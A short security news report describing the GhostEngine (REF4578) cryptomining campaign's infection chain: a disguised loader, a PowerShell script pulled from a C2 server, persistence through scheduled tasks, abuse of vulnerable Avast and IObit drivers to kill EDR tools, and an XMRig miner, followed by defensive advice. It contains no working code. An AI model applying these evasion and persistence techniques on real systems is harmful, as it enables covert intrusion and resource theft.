HQ/EMEAFind out how we can help your business
The REF4578 cryptocurrency mining campaign has been allegedly installing a malicious payload called GhostEngine, which leverages vulnerable drivers to kill security products and install an XMRig miner.
Researchers have yet to attribute this sophisticated campaign to any known threat actors or provide information about its targets/victims, leaving its origin a mystery.
However, a recent report explained that the threat actor’s attack starts with executing a file known as ‘Tiworker.exe,’ which masquerades as a standard Windows file. This executable is an initial stage payload for GhostEngine, a PowerShell script that downloads modules to run various commands on a compromised system.
Subsequently, once the campaign initiates Tiworker.exe, it downloads a PowerShell script called ‘get.png’ from the attacker’s C2 server, which also serves as GhostEngine’s principal loader. This PowerShell script installs and configures new modules, turns off Windows Defender, enables remote services, and clears various Windows event logs.
Next, get.png ensures that the system has at least 10MB of free space so it can continue the infection and create scheduled activities named ‘OneDriveCloudSync,’ ‘DefaultBrowserUpdate,’ and ‘OneDriveCloudBackup’ for establishing persistence.
A PowerShell script is the final phase in which the GhostEngine can execute its malicious capabilities.
The PowerShell script can then download and run an app called smartsscreen.exe, which serves as the main payload for GhostEngine. This malware is responsible for terminating and destroying EDR software and downloading and activating the XMRig cryptocurrency miner.
GhostEngine installs two vulnerable kernel drivers to terminate EDR software. The first driver is aswArPots.sys (an Avast driver), which terminates EDR processes, and the other drive is IObitUnlockers.sys (an Iobit driver), which deletes the related executable.
Furthermore, a Windows service called ‘msdtc’ loads a DLL named ‘oci.dll’ to ensure the campaign’s persistence. Once started, this DLL downloads a new copy of ‘get.png’ and installs the most recent version of GhostEngine on the infected device.
Researchers recommend that security defenders should look for strange PowerShell execution, unexpected process activity, and network traffic referring to crypto-mining pools.
Additionally, users must avoid vulnerable drivers to avoid getting infected by this campaign. The most aggressive approach to avoid this new cryptomining attack is to prevent file creation from susceptible drivers such as aswArPots.sys and IobitUnlockers.sys.
